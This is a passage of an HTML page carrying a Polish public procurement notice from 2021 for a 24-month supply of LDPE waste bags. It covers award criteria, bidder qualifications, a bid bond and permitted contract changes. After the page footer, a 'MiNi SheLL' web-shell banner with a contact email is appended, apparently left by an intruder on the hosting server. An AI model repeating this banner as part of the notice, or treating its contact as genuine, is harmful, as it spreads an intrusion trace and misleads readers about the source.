jest do dostarczenia przedmiotu zamówienia na adres Za-mawiającego zgodnie z wewnętrznymi potrzebami Zamawiającego zgłaszanymi telefoniczni, e-mailem lub faxem, nie później niż 5 dni roboczych od zgłoszenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">19520000-7 - Produkty z tworzyw sztucznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18930000-7 - Worki i torby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający oświadcza, iż przewiduje udzielenia zamówień podobnych, o których mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/><br/>Zamawiający przewiduje udzielenia zamówienia, zgodnie z art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych w przypadku udzielenia dotychczasowemu wykonawcy zamówienia podstawowego zamówienia na dodatkowe dostawy osprzętu (do 15% wartości zamówienia podstawowego), polegające na powtórzeniu podobnych dostaw, jeżeli takie zamówienie jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości, a informacja o ww. została umieszczona w ogłoszeniu o zamówieniu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty dokonany zostanie na podstawie niżej<br/>przedstawionych kryteriów (nazwa kryterium, waga, sposób punktowania):Cena ofertowa - 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> w zakresie posiadania wiedzy i doświadczenia:<br/><br/>Wykonawca wykonał (zakończył wykonanie), a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej dwie dostawy worków na odpady z folii LDPE o wartości minimum 200 000,00 zł brutto każda dostawa, odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia („związane z przedmiotem zamówienia”), tj. polegające na sukcesywnej (tj. przez co najmniej 6 miesięcy) dostawie worków z folii LDPE na odpady komunalne zbierane selektywnie potwierdzone dowodami określającymi, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie (załącznik nr 1.4 do swz).<br/><br/>Uwagi: <br/>1.	Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>2.	Zamawiający uzna za spełniony warunek SWZ również w przypadku, gdy doświadczenie wykazane przez Wykonawcę obejmuje szerszy zakres usług od wymaganych przez Za-mawiającego.<br/>3.	W przypadku, gdy jakakolwiek wartość dotycząca powyższych warunków wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego Banku Polskiego (dalej: NBP) dla danej waluty z dnia, w którym nastąpi po-stępowaniu publikacja przedmiotowego postępowania w Biuletynie Zamówień Publicznych. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Zamawiający wymaga złożenia:1) Oświadczenia<br/>zgodnie z wzorem stanowiącym załącznik nr 1.2 do SWZ. 2) Oświadczenia wykonawcy, w zakresie art.<br/>108 ust. 1 pkt. 5 ustawy Pzp., o braku przynależności do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz.U. z 2020r., poz. 107 i<br/>1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia<br/>stanowi załącznik nr 1.6 do SWZ.3) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3<br/>miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. W<br/>przypadku, gdy odpis jest dostępny bezpłatnie w publicznej bazie danych zamawiający nie wymaga<br/>złożenia odpisu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia warunków udziału w postępowaniu Zamawiający wymaga złożenia: <br/>1)	Wykazu zrealizowanych dostaw wraz z dowodami potwierdzającymi ich należyte wykona-nie, zgodnie z wzorem wykazu stanowiącym załącznik nr 1.4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 6.3.	Dokumenty i oświadczenia składane wraz z ofertą<br/><br/>1.	Wypełniony i podpisany formularz oferty wg załącznika Nr 1.1 do SWZ.<br/>2.	Wypełnione i podpisane oświadczenie Wykonawcy wg załącznika Nr 1.2 do SWZ lub Wypełnione i podpisane oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego wg załącznika Nr 1.2 do SWZ.<br/>3.	Oświadczenie i zobowiązanie podmiotu udostępniającego zasoby wg załącznika Nr 1.3 do SWZ (jeśli dotyczy).<br/>4.	Pełnomocnictwo (jeśli dotyczy).<br/>5.	Oświadczenie, z którego wynika, które elementy przedmiotu zamówienia wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego na podstawie art. 117 ust 4 ustawy Pzp (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przystępujący do przetargu zobowiązany jest do złożenia wadium w wysokości: 4 000,00 zł (słownie: cztery tysiące złotych 00/100), <br/>2.	Wadium musi obejmować pełen okres związania ofertą.<br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>Szczegółowe kwestie dot. wadium zawiera rozdział 20 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim<br/>przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie<br/>prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.2. Przepisy ustawy dotyczące<br/>Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.3. W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego<br/>oświadczenie Wykonawcy, o którym mowa wyżej w niniejszej SWZ składa każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.4. Warunek dotyczący uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o<br/>którym mowa w art. 112 ust. 2 pkt 2 ustawy, zostanie spełniony, jeżeli co najmniej jeden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej i wykona elementy<br/>przedmiotu zamówienia, do których realizacji te uprawnienia są wymagane.5. W odniesieniu do<br/>warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały<br/>sformułowane) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają elementy przedmiotu zamówienia, do<br/>realizacji których te zdolności są wymagane.6. W przypadkach, o których mowa wyżej w pkt. 4 i<br/>5, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do<br/>oferty oświadczenie, z którego wynika, które elementy przedmiotu zamówienia wykonają<br/>poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:<br/><br/>1.	Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.<br/>2.	Zakres świadczenia wykonawcy określony w umowie co do zasady jest tożsamy z zobowiązaniami wykonawcy określonymi w ofercie oraz określeniem przedmiotu zamówienia zawartym w swz. Jeśli ustawa nie stanowi inaczej, w części wykraczającej poza określenie przedmiotu zamówienia zawartego w specyfikacji warunków zamówienia umowa podlega unieważnieniu.<br/>3.	Zamawiający przewiduje następujące możliwości dokonania zmiany zawartej umowy oraz określa warunki takiej zmiany w przypadku:<br/>1)	zmiany stawek cenowych brutto w przypadku zmiany urzędowej stawki podatku VAT: zmiana stawki VAT w trakcie trwania umowy upoważnia wykonawcę do zmiany treści umowy o uwzględnienie nowej stawki podatku VAT w płatnościach.<br/>2)	zmiany terminu przewidzianego na zakończenie dostawy w przypadku wstrzymania dostawy przez Zamawiającego,<br/>3)	gdy wykonawcę, któremu zamawiający udzielił zamówienia, zastępuje nowy wykonawca w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy;<br/>4)	zamawiający przejmuje zobowiązania wykonawcy względem jego podwykonawców, co ex lege oznacza zmianę podmiotowości wykonawcy;<br/>5)	zmiana nie jest istotna w rozumieniu uPzp;<br/>6)	zmiana ilości danego typu worków związana z koniecznością zapewnienia spójnego procesu odbioru odpadów selektywnie zebranych w przypadku zwiększenia zapotrzebowania na dany asortyment worków,<br/>7)	zmiana zaoferowanych worków na worki o parametrach tożsamych lub lepszych od przyjętych w ofercie w przypadku wycofania z rynku oferowanych worków lub komponentu do ich produkcji. Wymagane jest oświadczenie producenta i wyłączna zgoda Zamawiającego,<br/>8)	zmiana przepisów prawa, w tym przepisów prawa miejscowego mające wpływ na wykonanie przedmiotu umowy, <br/>9)	zmiana wymagań Gmin (JST) obsługiwanych przez Zamawiającego w zakresie wykonania usług odbioru i transportu odpadów komunalnych od właścicieli nieruchomości, dotycząca zastosowanych parametrów technicznych i jakościowych worka (wymiary, grubość, sposób zawiązania, nadruk itp.),<br/>10)	aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.<br/>4.	Zmiana umowy musi zostać dokonana nie inaczej niż w drodze obustronnie podpisanego pisemnego aneksu.<br/>5.	Nie stanowi istotnej zmiany umowy w rozumieniu ustawy Prawo zamówień publicznych:<br/>1)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana osób do kontaktu itp.);<br/>2)	zmiana danych teleadresowych oraz osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.<br/>6.	Strony zgodnie ustalają, iż zakazuje się zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty poza przypadkami określonymi w treści niniejszej umowy, treści swz nr PK/02/2021 oraz przepisach prawa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-05 07:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa oferte za pośrednictwem "Formularza do złożenia, zmiany, wycofania oferty lub wniosku" dostępnego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-05 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Projekt umowy przedstawiono w załączniku nr 1.5 do niniejszej SWZ.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com